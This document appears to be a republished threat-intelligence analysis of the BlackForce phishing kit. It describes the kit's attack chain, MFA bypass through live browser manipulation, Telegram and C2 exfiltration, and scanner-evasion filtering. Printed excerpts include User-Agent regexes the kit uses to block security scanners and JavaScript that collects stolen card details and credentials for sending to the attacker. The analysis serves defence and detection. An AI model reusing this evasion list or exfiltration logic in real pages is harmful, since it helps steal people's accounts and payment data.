
























The following sections provide insight into each stage of BlackForce’s attack chain.
ThreatLabz began its analysis of BlackForce when we identified a distinct pattern while hunting for phishing campaigns. The suspicious domains consistently used JavaScript files with cache-busting hashes in their names. This led ThreatLabz to the phishing kit's entry point, a single line in the page's HTML source that loads the entire platform.
Cache-busting is a technique where a hash is generated based on the file's contents thus forcing the victim's browser to download the latest version of the malicious script instead of using a cached version. The code example below illustrates the DOM structure of the malicious webpage, featuring a filename format (index-[hash].js) that is commonly associated with professional build tools.

The most effective deception tactic used by the BlackForce phishing kit is its "legitimate-looking" codebase. Our analysis found that more than 99% of the malicious JavaScript file's content consists of production builds of React and React Router, giving it a legitimate appearance.
The BlackForce attack chain features a vetting system to qualify targets, after which a live operator takes over to orchestrate a guided compromise. The attack chain for this campaign is shown in the figure below.

Figure 1: Attack chain diagram depicting the BlackForce attack flow.
The sequence of events for a BlackForce phishing campaign are as follows:
1. The victim clicks on the phishing link and is directed to an attacker-controlled phishing page.
2. A server-side Internet Service Provider (ISP)/vendor blocklist is applied to the victim's IP or User-Agent, blocking any traffic identified as a crawler or scanner.
3. After user validation, the phishing page is served and is designed to appear as a legitimate website, as seen in the figure below.

Figure 2: Shows the legitimate-looking phishing page(s) displayed to the victim.
4. The victim, believing the page is authentic, enters their credentials, which are immediately captured by the attacker.
5. The attacker receives real-time victim session alerts and the exfiltrated credentials to their command-and-control (C2) panel alerting them of a live target. The stolen credentials are also sent to the attacker via a Telegram channel, as shown in the figure below.

Figure 3: The attacker’s view of the exfiltrated data being sent to Telegram.
6. The attacker attempts to log into the legitimate target website using the stolen credentials, triggering an MFA authentication prompt.
7. Using MitB attack techniques, the attacker deploys a fake MFA authentication page to the victim’s browser through the C2 panel, as shown in the figure below.

Figure 4: BlackForce control panel for version 3.
8. The victim's browser renders the fake MFA page, and the victim, unaware of the attack, enters their MFA code, as shown in the figure below.

Figure 5: Example BlackForce phishing page that hijacks an SMS code sent to the victim.
9. The attacker captures the MFA code and submits it to the legitimate website, successfully bypassing the MFA process and compromising the victim’s account.
ANALYST NOTE: It is important to note that not all BlackForce phishing campaigns display pages to steal MFA codes, since not all websites use MFA. If the website utilizes MFA, the BlackForce phishing kit’s control panel provides attackers with custom options (based on the target brand) to steal codes that are provided via SMS, card, or app-based authentication.
Once the attack is complete, the victim is redirected to the homepage of the legitimate website, hiding evidence of the compromise and ensuring the victim remains unaware of the attack.
The networking module is the most important part of the BlackForce phishing kit. The attackers use Axios, a popular HTTP client, to manage all communication. Axios instances control the data flow in the kit. Version 3 of BlackForce includes two client-side Axios instances: one for C2 communication and another for exfiltrating data to a hardcoded Telegram channel. In versions 4 and 5 of BlackForce, only the primary C2 instance remains, and the Telegram configuration has been moved to the server-side. The figure below shows the BlackForce control panel used to set up the exfiltration channel for version 5.

Figure 6: BlackForce version 5 configuration for exfiltration settings.
The BlackForce phishing kit employs anti-analysis techniques to evade detection and prolong its operational lifespan. The first line of defense is a proactive client-side filter, which attempts to identify non-human visitors the moment they land on the page. This is accomplished with a database of signatures and a parsing engine that processes the visitor's User-Agent string. The code compares the User-Agent against a set of predefined regular expressions to detect web crawlers, security scanners, and SEO tools, as shown in the example below.
{
regex: "Nmap Scripting Engine",
name: "Nmap",
category: "Security Checker",
url: "https://nmap.org/book/nse.html",
producer: {
name: "Nmap",
url: "https://nmap.org/"
}
},
{
regex: "Netcraft( Web Server Survey| SSL Server Survey|SurveyAgent)",
name: "Netcraft Survey Bot",
category: "Search bot",
url: "",
producer: {
name: "Netcraft",
url: "http://www.netcraft.com"
}
},
{
regex: "MSNBot|msrbot|bingbot|BingPreview|msnbot-(UDiscovery|NewsBlogs)|adidxbot",
name: "BingBot",
category: "Search bot",
url: "http://search.msn.com/msnbot.htmn",
producer: {
name: "Microsoft Corporation",
url: "http://www.microsoft.com"
}
},
In versions 4 and 5, the BlackForce C2 server proactively filters all incoming traffic. Version 4 enforces a mobile-only policy that rejects all desktop user agents and cross-references the remaining visitors' user agents, resolved hostnames, and ISPs against a comprehensive blocklist of keywords. Any signature associated with a security scanner or automated crawler results in an immediate redirect to a generic error page. The ISP blocklist for BlackForce version 4 is available in the ThreatLabz GitHub repository.
BlackForce also enforces a list of permitted countries and performs User-Agent profiling to immediately block any identified scanners and crawlers, as shown in the figure below.

Figure 7: Anti-analysis mechanisms implemented in version 5 of BlackForce.
A critical architectural difference separating BlackForce version 3 from its successors is the evolution from a stateless to a stateful attack model. In version 3, the attack was fundamentally fragile as exfiltrated credentials existed only in the browser's active memory. This meant a page refresh or network error could erase the stolen data and break the attack flow. To address this weakness, the author of BlackForce versions 4 and 5 leveraged the browser's sessionStorage to create a persistent, stateful session. This allows BlackForce to "remember" credentials across the entire multi-stage attack. The example below, taken from version 4, demonstrates how data is exfiltrated using the sendMessage function by retrieving it from sessionStorage.
try {
o(!0);
const m = y.ccn.replace(/\s/g, "");
sessionStorage.setItem("cc", m);
const x = {
ccn: y.ccn,
exp: y.exp,
cvv: y.cvv,
user: sessionStorage.getItem("user"),
pass: sessionStorage.getItem("pass"),
name: sessionStorage.getItem("name"),
dob: sessionStorage.getItem("dob"),
city: sessionStorage.getItem("city"),
phone: sessionStorage.getItem("phone"),
address: sessionStorage.getItem("address"),
zip: sessionStorage.getItem("zip")
},
C = await pt.sendMessage(x, e, "card"),
P = (await pt.getConfig()).data.panel;
C.data.status === "success" ? (o(!1), n(null), t(P === !0 ? "loader" : "confirm")) : (n(null), o(!1))
}The BlackForce C2 panel controls every action from the moment a victim lands on the page until their data is stolen. The panel provides a set of asynchronous functions that can be categorized into four distinct roles:
The BlackForce C2 panel for version 5 is shown in the figure below.

Figure 8: BlackForce C2 panel for version 5.
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。